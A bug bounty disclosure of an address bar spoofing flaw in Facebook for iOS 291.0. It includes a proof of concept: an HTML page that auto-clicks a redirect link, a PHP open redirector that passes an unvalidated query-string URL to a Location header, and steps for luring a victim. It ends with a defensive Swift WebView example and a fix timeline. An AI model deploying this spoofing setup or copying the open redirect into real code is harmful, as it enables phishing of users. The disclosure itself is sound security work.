Facebook iOS address bar spoofing

There is an inconsistency in the way the Facebook iOS Inbox, which uses a WebView component, renders certain web page redirections. It allows an attacker to perform address bar spoofing: an HTTPS URL is shown in the address bar while the content displayed belongs to some other web site. To demonstrate it, I created a page whose JavaScript automatically clicks a link that redirects to an invalid (unresponsive) port. Because the response is delayed, the browser keeps displaying the content from the attacker's site while the address bar already shows the redirect target, and it never updates back to the initiating page from the non-responsive one.

Affected version:

App version: Facebook for iOS 291.0


Setup:

Create two files and host them on a server:
1. red.php:

<html>
   <head>
      <title>Instagram</title>
   </head>
   <body>
      <a href="/loc.php?url=https://instagram.com:1234/"></a>
      <script>
         document.querySelector("a").click();
      </script>
      <div id="1"><font size="15">FBInbox : Rahul Kankrale</font></div>
   </body>
</html>

2. loc.php:

<?php
// Open redirect used only as the PoC harness: the target comes straight from
// the query string, so the page can send the WebView to an unresponsive port.
$loc = $_GET["url"];
header("Location: $loc");
?>

Steps to reproduce:

1. Send https://servicenger.com/red123.php to the victim in a message.
2. Copy the thread link by going to m.facebook.com > victim's thread; it looks like https://m.facebook.com/messages/read/?tid
3. Paste the copied URL on the victim's wall.
4. The victim, using Facebook for iOS, clicks the link posted by the attacker, so the message thread opens inside the Facebook app itself.
5. Click https://servicenger.com/red123.php from the opened thread.
6. The address bar immediately shows instagram.com while the content is from servicenger.com.
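The root cause described above and reproduced by the steps is an address bar that adopts the URL of a pending navigation (the redirect target on the dead port) while the previous document is still on screen. The following is an added example, not Facebook's code and not part of the original report; it assumes the in-app browser is built on WKWebView (the report only says "WebView component"). The class name InAppBrowserViewController and the committedURL property are my own. It binds the address bar to the committed navigation only, so a redirect whose target never answers cannot change the displayed host:

```swift
import UIKit
import WebKit

// Added example, not Facebook's code. Assumes WKWebView and WKNavigationDelegate.
// The address bar is driven by committedURL, which changes only in didCommit,
// never from a provisional (pending) navigation such as the 302 to
// https://instagram.com:1234/ in the PoC.
final class InAppBrowserViewController: UIViewController, WKNavigationDelegate {
    private let webView = WKWebView()
    private let addressLabel = UILabel()

    // URL of the document actually rendered in the WebView.
    private(set) var committedURL: URL?

    override func viewDidLoad() {
        super.viewDidLoad()
        view.backgroundColor = .white

        addressLabel.textAlignment = .center
        addressLabel.font = .monospacedSystemFont(ofSize: 14, weight: .regular)
        addressLabel.translatesAutoresizingMaskIntoConstraints = false
        webView.translatesAutoresizingMaskIntoConstraints = false
        view.addSubview(addressLabel)
        view.addSubview(webView)
        NSLayoutConstraint.activate([
            addressLabel.topAnchor.constraint(equalTo: view.safeAreaLayoutGuide.topAnchor),
            addressLabel.leadingAnchor.constraint(equalTo: view.leadingAnchor),
            addressLabel.trailingAnchor.constraint(equalTo: view.trailingAnchor),
            addressLabel.heightAnchor.constraint(equalToConstant: 32),
            webView.topAnchor.constraint(equalTo: addressLabel.bottomAnchor),
            webView.leadingAnchor.constraint(equalTo: view.leadingAnchor),
            webView.trailingAnchor.constraint(equalTo: view.trailingAnchor),
            webView.bottomAnchor.constraint(equalTo: view.bottomAnchor),
        ])

        webView.navigationDelegate = self
        render(loading: false)
    }

    func load(_ url: URL) {
        webView.load(URLRequest(url: url))
    }

    // MARK: WKNavigationDelegate

    // A request was issued but no byte of the new document has arrived. The
    // screen still shows the old page, so the bar must not adopt webView.url,
    // which may already report the pending URL at this point.
    func webView(_ webView: WKWebView, didStartProvisionalNavigation navigation: WKNavigation!) {
        render(loading: true)
    }

    // The 302 from the redirector lands here. Still provisional: the bar stays put.
    func webView(_ webView: WKWebView,
                 didReceiveServerRedirectForProvisionalNavigation navigation: WKNavigation!) {
        render(loading: true)
    }

    // WebKit swapped documents: from now on the content on screen belongs to
    // webView.url. This is the only place the displayed origin may change.
    func webView(_ webView: WKWebView, didCommit navigation: WKNavigation!) {
        committedURL = webView.url
        render(loading: true)
    }

    func webView(_ webView: WKWebView, didFinish navigation: WKNavigation!) {
        render(loading: false)
    }

    // Target never answered (closed port, timeout, DNS failure). The committed
    // page is still on screen, so the bar keeps showing committedURL.
    func webView(_ webView: WKWebView, didFailProvisionalNavigation navigation: WKNavigation!,
                 withError error: Error) {
        render(loading: false)
    }

    // Draw the bar from committedURL only; a pending load is just an activity hint.
    private func render(loading: Bool) {
        guard let url = committedURL, let host = url.host else {
            addressLabel.text = loading ? "Loading…" : ""
            return
        }
        let prefix = (url.scheme == "https") ? "https://" : "http://"
        addressLabel.text = prefix + host + (loading ? "  · loading" : "")
    }
}
```

Present the controller and call `load(_:)` with the initial URL. With this delegate, the sequence from the report (attacker page → JavaScript click → 302 → unresponsive port) leaves the bar on the attacker's host until the redirect target actually commits, and `didFailProvisionalNavigation` leaves it there when the target times out. Whether an address bar should show pending URLs at all is a product decision; if it does, the pending value must be visually distinct from a committed one and must never carry the HTTPS indicator.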


Proof of concept:


Timeline:

10/10/2020: Submitted

10/10/2020: Triaged

28/10/2020: Fixed & Rewarded $1500